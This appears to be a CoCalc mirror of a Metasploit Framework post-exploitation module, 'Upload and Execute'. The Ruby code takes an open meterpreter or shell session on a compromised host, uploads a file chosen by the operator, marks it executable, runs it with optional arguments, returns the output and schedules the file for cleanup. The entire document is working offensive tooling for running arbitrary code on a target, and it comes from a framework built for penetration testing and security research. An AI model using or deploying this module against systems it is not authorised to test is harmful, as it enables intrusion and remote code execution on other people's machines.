CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/manage/upload_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Exploit::FileDropper

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Upload and Execute',

15
        'Description' => %q{Push a file and execute it.},

16
        'Author' => 'egypt',

17
        'License' => MSF_LICENSE,

18
        'Platform' => ['win', 'unix', 'linux', 'osx', 'bsd', 'solaris'],

19
        'SessionTypes' => ['meterpreter', 'shell']

20
      )

21
    )

22


23
    register_options([

24
      OptPath.new('LPATH', [true, 'Local file path to upload and execute']),

25
      OptString.new('RPATH', [false, 'Remote file path on target (default is basename of LPATH)']),

26
      OptString.new('ARGS', [false, 'Command-line arguments to pass to the uploaded file']),

27
      OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 60])

28
    ])

29
  end

30


31
  def run

32
    print_status("Uploading #{lpath} to #{rpath}")

33
    upload_file(rpath, lpath)

34
    register_file_for_cleanup(rpath)

35


36
    if session.platform == 'windows'

37
      # Don't use cmd.exe /c start so we can fetch output

38
      cmd = rpath

39
    else

40
      # Set 700 so only we can execute the file

41
      chmod(rpath, 0o700)

42


43
      # Handle absolute paths

44
      cmd = rpath.start_with?('/') ? rpath : "./#{rpath}"

45
    end

46


47
    print_status("Executing command: #{cmd}")

48
    output = cmd_exec(cmd, args, timeout)

49


50
    if output.blank?

51
      print_status('Command returned no output')

52
    else

53
      print_line(output)

54
    end

55
  end

56


57
  def lpath

58
    datastore['LPATH']

59
  end

60


61
  def rpath

62
    datastore['RPATH'].blank? ? File.basename(lpath) : datastore['RPATH']

63
  end

64


65
  def args

66
    datastore['ARGS']

67
  end

68


69
  def timeout

70
    datastore['TIMEOUT']

71
  end

72
end

73


74